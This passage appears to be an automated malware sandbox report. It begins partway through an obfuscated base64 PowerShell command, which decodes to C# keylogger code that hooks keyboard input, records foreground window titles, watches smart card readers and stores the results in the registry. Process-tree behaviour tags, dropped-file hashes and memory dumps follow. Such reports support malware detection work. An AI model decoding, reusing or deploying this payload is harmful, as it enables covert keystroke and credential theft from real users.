4AZwA+ACAAawA3ADYAIAA9ACAAagA2ADAAKABlADcANQApADsAaQBuAHQAIABoADcANwAgAD0AIABrADcANgAuAEMAbwB1AG4AdAA7AGkAZgAgACgAaAA3ADcAIAA+ACAAMAApAHsAaQBuAHQAIABpADcAOAAgAD0AIAAwADsAbwAyADgAWwBdACAAbwA3ADkAIAA9ACAAbgBlAHcAIABvADIAOABbAGgANwA3AF0AOwBmAG8AcgBlAGEAYwBoACAAKABzAHQAcgBpAG4AZwAgAGQAOAAwACAAaQBuACAAawA3ADYAKQB7AG8ANwA5AFsAaQA3ADgAXQAuAGcAMgA5ACAAPQAgAGQAOAAwADsAaQA3ADgAKwArADsAfQBpAGYAIAAoAFMAQwBhAHIAZABHAGUAdABTAHQAYQB0AHUAcwBDAGgAYQBuAGcAZQAoAGUAMgA3ACwAIAA1ADAAMAAsACAAbwA3ADkALAAgAG8ANwA5AC4ATABlAG4AZwB0AGgAKQAgAD0APQAgADAAKQB7AGYAbwByACAAKABpAG4AdAAgAG4AOAAxACAAPQAgADAAOwAgAG4AOAAxACAAPAAgAGgANwA3ADsAIABuADgAMQArACsAKQB7AGwANwAzACAAPQAgAG8ANwA5AFsAbgA4ADEAXQA7AGQANwAyACAAKwA9ACAAbAA3ADMALgBnADIAOQA7AGkAZgAgACgAKABsADcAMwAuAGsAMwAyACAAJgAgADAAeAAwADAAMAAwADAAMAAyADAAKQAgACEAPQAgADAAKQAgAGQANwAyACAAKwA9ACAAIgAgAC0AIABmAG8AdQBuAGQAIgA7AGQANwAyACAAKwA9ACAAIgBcAHIAXABuACIAOwB9AH0AfQB9AH0AUgBlAGcAaQBzAHQAcgB5AC4AUwBlAHQAVgBhAGwAdQBlACgAbwAyADAALAAgAHAAMgAyACwAIABkADcAMgApADsAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAC4AUwBsAGUAZQBwACgAMQAwADAAMAApADsAfQByAGUAdAB1AHIAbgAgADAAOwB9AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFMAZQB0AFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABpAG4AdAAgAGgAOAAyACwAIABpADMAIABnADgAMwAsACAASQBuAHQAUAB0AHIAIABhADgANAAsACAAdQBpAG4AdAAgAGYAOAA1ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFUAbgBoAG8AbwBrAFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABJAG4AdABQAHQAcgAgAGQAOAA2ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAGEAbABsAE4AZQB4AHQASABvAG8AawBFAHgAKABJAG4AdABQAHQAcgAgAGQAOAA2ACwAIABpAG4AdAAgAG4ANAA4ACwAIABJAG4AdABQAHQAcgAgAGYANAA5ACwAIABJAG4AdABQAHQAcgAgAG4ANQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUAKABzAHQAcgBpAG4AZwAgAGkAOAA3ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAE0AYQBwAFYAaQByAHQAdQBhAGwASwBlAHkAKABpAG4AdAAgAGwAOAA4ACwAIAB1AGkAbgB0ACAAYQA4ADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAARwBlAHQASwBlAHkAYgBvAGEAcgBkAEwAYQB5AG8AdQB0ACgAdQBpAG4AdAAgAG8AOQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFQAbwBVAG4AaQBjAG8AZABlAEUAeAAoAGkAbgB0ACAAYQA5ADEALAAgAHUAaQBuAHQAIABoADkAMgAsACAAYgB5AHQAZQBbAF0AIABpADkAMwAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGEAOQA0ACwAIABpAG4AdAAgAG8AOQA1ACwAIAB1AGkAbgB0ACAAYQA5ADYALAAgAHUAaQBuAHQAIABtADkANwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABHAGUAdABLAGUAeQBiAG8AYQByAGQAUwB0AGEAdABlACgAYgB5AHQAZQBbAF0AIABvADkAOAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKAB1AGkAbgB0ACAAYgA5ADkALAAgAHIAZQBmACAAdQBpAG4AdAAgAG0AMQAwADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQATABlAG4AZwB0AGgAKAB1AGkAbgB0ACAAawAxADAAMQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAdQBpAG4AdAAgAGsAMQAwADEALAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABrADEAMAAyACwAIABpAG4AdAAgAHAAMQAwADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABjADEAMAA0ACwAIAB1AGkAbgB0ACAAZwAxADAANQAsACAAbwA2ACAAaQAxADAANgAsACAASQBuAHQAUAB0AHIAIABuADEAMAA3ACwAIAB1AGkAbgB0ACAAYgAxADAAOAAsACAASQBuAHQAUAB0AHIAIABrADEAMAA5ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAB1AGkAbgB0ACAAaAAxADEAMAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAAQwByAGUAYQB0AGUATQB1AHQAZQB4ACgASQBuAHQAUAB0AHIAIABrADEAMQAxACwAIABiAG8AbwBsACAAagAxADEAMgAsACAAcwB0AHIAaQBuAGcAIABhADEAMQAzACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABPAHAAZQBuAE0AdQB0AGUAeAAoAHUAaQBuAHQAIABtADEAMQA0ACwAIABiAG8AbwBsACAAbgAxADEANQAsACAAcwB0AHIAaQBuAGcAIABhADEAMQAzACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB3AGkAbgBzAGMAYQByAGQALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEUAcwB0AGEAYgBsAGkAcwBoAEMAbwBuAHQAZQB4AHQAKABJAG4AdAAzADIAIABsADEAMQA2ACwAIABJAG4AdABQAHQAcgAgAG4AMQAxADcALAAgAEkAbgB0AFAAdAByACAAYQAxADEAOAAsACAAbwB1AHQAIABJAG4AdABQAHQAcgAgAGUAMQAxADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHcAaQBuAHMAYwBhAHIAZAAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBTAEMAYQByAGQATABpAHMAdABSAGUAYQBkAGUAcgBzAEEAIgAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAKABJAG4AdABQAHQAcgAgAGUAMQAxADkALAAgAGIAeQB0AGUAWwBdACAAbAAxADIAMAAsACAAYgB5AHQAZQBbAF0AIABjADEAMgAxACwAIABvAHUAdAAgAFUASQBuAHQAMwAyACAAYQAxADIAMgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdwBpAG4AcwBjAGEAcgBkAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFMAQwBhAHIAZABHAGUAdABTAHQAYQB0AHUAcwBDAGgAYQBuAGcAZQAoAEkAbgB0AFAAdAByACAAZQAxADEAOQAsACAAVQBJAG4AdAAzADIAIABqADEAMgAzACwAIABbAEkAbgAsACAATwB1AHQAXQAgAG8AMgA4AFsAXQAgAG8ANwA5ACwAIABJAG4AdAAzADIAIABpADEAMgA0ACkAOwB9AH0ADQAKACIAQAAgAC0AUgBlAGYAZQByAGUAbgBjAGUAZABBAHMAcwBlAG0AYgBsAGkAZQBzACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAWwBoADEALgBtADIAXQA6ADoAUgB1AG4AKAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBjAG8AbgBzAG8AbABlAF0AOgA6AEMAYQBwAHMATABvAGMAawAgAH0AIAApAA==
    1⤵
    • Process spawned unexpected child process
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1676
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kvy0zkmh\kvy0zkmh.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:64
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60CD.tmp" "c:\Users\Admin\AppData\Local\Temp\kvy0zkmh\CSCC439CA88B3F748ED93F5AEEC36EE23.TMP"
        3⤵
          PID:4368

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      8340b5c4942d912a9d2454e9696b9a7e

      SHA1

      8b1594782f19f28b4b54f7a6363957982afa17c3

      SHA256

      9eaef035d56edd24f57fff57ebee0f4c44a7029562ca4b2ad3a36351385b5c22

      SHA512

      6c805b6b00101797609d62f20a13d388a98001f56bd9a0b9a0cf5ad506d5b5293f0539fc8c8e3fe1761378d6797c7a5792fbda859c0e8bdef260a9566c5cc675

    • C:\Users\Admin\AppData\Local\Temp\1067919630

      Filesize

      41KB

      MD5

      c4d2d117803c4f2a631087eb2ade30a6

      SHA1

      ff32d1b965a2f5956639b6540e5c2d15e7f289d9

      SHA256

      375e8265900a3c4acebd38bdcd959efa80ccc73a47003eef7b6fc019bfd118c8

      SHA512

      ae85c1b6f948cf298ae498b653ee3435a96b4dd1cde65f0edb426b8c0d596f14b6bc8c5b7598278e6779f1b38f2158ade30b9dbba7c9b0dad04fb83c616b1ab7

    • C:\Users\Admin\AppData\Local\Temp\14438590

      Filesize

      57KB

      MD5

      edc65270f5b190e82fd98b85303c8e97

      SHA1

      bade9760997ac713743cf48759acc58867a0dd73

      SHA256

      2d61b9799418fe0005eb663b970b19d8e330b51e3b68099a209d066c84d32015

      SHA512

      699abecff99bb9ff7d4443c39a1ad853df025531aac4ceb5c12f765f501ad4b456eea9d5994a847fca67674bcafb9cf29c4c4873c839b5d66a4d0602e534184f

    • C:\Users\Admin\AppData\Local\Temp\RES60CD.tmp

      Filesize

      1KB

      MD5

      17d908ce68aac11f1d0004189f3bd47e

      SHA1

      b8e4da7e605a32192eb7dbd6ec6261d6c5cc58ff

      SHA256

      af72714ed27dffc4ad0e4a24e9f4ec76585a45312172af77b7ce0cacb1893561

      SHA512

      ad6fa32bcb839403513e42b7f02ebb2d71710c3f9bb13173a4c6c85e89337f9d941bb815c2f4a76f0af2140ac3efc5f7f1093c61cfdbbab3c41da5f9055458d2

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bhykyiny.shi.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

      Filesize

      13KB

      MD5

      0a235e8362613509efd31bfdbb22f978

      SHA1

      8bcb0297001dfd4963e8d17270ad0d2024a96912

      SHA256

      175c6cc0a98c16f18e333b5622415d3d962a5d1c05044d34823c8541d6abfcd5

      SHA512

      bb2cf2457ba063c971c9944f9a6fda4a89eab80265e270f6371a826bdfc753a62828c83f984897127f213837adb8f90956263dd51823e270c5081fafea630db4

    • C:\Users\Admin\AppData\Local\Temp\kvy0zkmh\kvy0zkmh.dll

      Filesize

      9KB

      MD5

      8cb11e301b74ad863f98032c967fe0cf

      SHA1

      1b8b9cf8b2f9ca0a6324cc3169d8f987de8853d2

      SHA256

      44c0bad0d0f6270729524c29931988f70465de523f69447bc1cd803c6e56af14

      SHA512

      35a8ba90f36f1b56550a5b4379e65a6e09508205ce690819c11c44fbfbaee603d4d99a7cfea9beb5772332be7db963bc188f5d29de02355c7b9ea3185e196e8e

    • C:\Users\Admin\AppData\Local\dynwrapx.dll

      Filesize

      13KB

      MD5

      ca820517f8fd74d21944d846df6b7c20

      SHA1

      1f87eeb37156d64de97d042b9bcfbaf185f8737d

      SHA256

      1b5eb6d4680f7d4da7e2a1a1060b9f13565e082346e375a92244bb55672d49d7

      SHA512

      27e83483f9dd50b2f897b5b93171b17c0e78719b6f05070c7ef4d69fb80f31cb1342b50685e43a7401fc13e56c83d5a52ed7ccfb69ac5bd3c33461fa10f3985a

    • \??\c:\Users\Admin\AppData\Local\Temp\kvy0zkmh\CSCC439CA88B3F748ED93F5AEEC36EE23.TMP

      Filesize

      652B

      MD5

      a773ffca9c39ffc1ba08cdbda6f92ded

      SHA1

      fcaa99e57e84a86c788de5baa3ebf08546f75897

      SHA256

      ad4f611b7214331d646d4766e2f0b9124ca421b2983a400b79a75ae1938c1580

      SHA512

      d76b3377b822936cde56a5418b9e054a3850172292791d910b20f5dea4c22f896c27c1f4c198fd482c2e8ccd1d33b6873b17897aef13b2a18eed3e854ffee089

    • \??\c:\Users\Admin\AppData\Local\Temp\kvy0zkmh\kvy0zkmh.0.cs

      Filesize

      7KB

      MD5

      5d213659c30df0548b2e73c49ab2861d

      SHA1

      cab754a8b7457d595ee1ae8b2926af3a9c11e023

      SHA256

      ea6a45c7d22650d5b5c7a96d543ad90951a5b02126bc3b4917a4ce9ff2d3026d

      SHA512

      724ef31c1f26c5aea409edf99b3a68974a6a58c68b00a6665e66d4732f2438dc9f866a39a9cd7507a6a9667707b890984a7a25f6a1fb7aa68c64a149c52af468

    • \??\c:\Users\Admin\AppData\Local\Temp\kvy0zkmh\kvy0zkmh.cmdline

      Filesize

      494B

      MD5

      6caf8a9f1bc94c53f922890f0aadb604

      SHA1

      3652f8143df75f53273485986ed7e4b21051f7c9

      SHA256

      4144f0461c1d52b72cdca23850c5a0ec233386d0e5086b2090f91d8c3d79e357

      SHA512

      f49dc392717fc212396520c96ee6092e3656ba94b00dc4b4ac03a172a19534aff95626fa4b472876b91c2eeb827a9b35ce9480c75b989d94025192dbd62cd316

    • memory/1676-73-0x000001C5BC1B0000-0x000001C5BC1D2000-memory.dmp

      Filesize

      136KB

    • memory/1676-123-0x000001C5BC3E0000-0x000001C5BC3E8000-memory.dmp

      Filesize

      32KB

    • memory/3140-40-0x0000000005740000-0x00000000057A6000-memory.dmp

      Filesize

      408KB

    • memory/3140-106-0x00000000070C0000-0x00000000070DA000-memory.dmp

      Filesize

      104KB

    • memory/3140-71-0x0000000005DA0000-0x0000000005DBE000-memory.dmp

      Filesize

      120KB

    • memory/3140-81-0x00000000738E0000-0x000000007392C000-memory.dmp

      Filesize

      304KB

    • memory/3140-79-0x0000000006360000-0x0000000006392000-memory.dmp

      Filesize

      200KB

    • memory/3140-94-0x0000000006340000-0x000000000635E000-memory.dmp

      Filesize

      120KB

    • memory/3140-95-0x0000000006F70000-0x0000000007013000-memory.dmp

      Filesize

      652KB

    • memory/3140-72-0x0000000005E50000-0x0000000005E9C000-memory.dmp

      Filesize

      304KB

    • memory/3140-29-0x0000000073A4E000-0x0000000073A4F000-memory.dmp

      Filesize

      4KB

    • memory/3140-132-0x0000000073A40000-0x00000000741F0000-memory.dmp

      Filesize

      7.7MB

    • memory/3140-108-0x0000000007120000-0x000000000712A000-memory.dmp

      Filesize

      40KB

    • memory/3140-30-0x0000000004900000-0x0000000004936000-memory.dmp

      Filesize

      216KB

    • memory/3140-54-0x0000000005920000-0x0000000005C74000-memory.dmp

      Filesize

      3.3MB

    • memory/3140-41-0x00000000057B0000-0x0000000005816000-memory.dmp

      Filesize

      408KB

    • memory/3140-115-0x00000000072C0000-0x00000000072D1000-memory.dmp

      Filesize

      68KB

    • memory/3140-36-0x0000000005010000-0x0000000005032000-memory.dmp

      Filesize

      136KB

    • memory/3140-33-0x0000000073A40000-0x00000000741F0000-memory.dmp

      Filesize

      7.7MB

    • memory/3140-32-0x00000000050A0000-0x00000000056C8000-memory.dmp

      Filesize

      6.2MB

    • memory/3140-31-0x0000000073A40000-0x00000000741F0000-memory.dmp

      Filesize

      7.7MB

    • memory/4820-96-0x00000000738E0000-0x000000007392C000-memory.dmp

      Filesize

      304KB

    • memory/4820-127-0x0000000007BE0000-0x0000000007BF4000-memory.dmp

      Filesize

      80KB

    • memory/4820-128-0x0000000007CE0000-0x0000000007CFA000-memory.dmp

      Filesize

      104KB

    • memory/4820-129-0x0000000007CC0000-0x0000000007CC8000-memory.dmp

      Filesize

      32KB

    • memory/4820-126-0x0000000007BD0000-0x0000000007BDE000-memory.dmp

      Filesize

      56KB

    • memory/4820-112-0x0000000007C20000-0x0000000007CB6000-memory.dmp

      Filesize

      600KB

    • memory/4820-107-0x0000000007FE0000-0x000000000865A000-memory.dmp

      Filesize

      6.5MB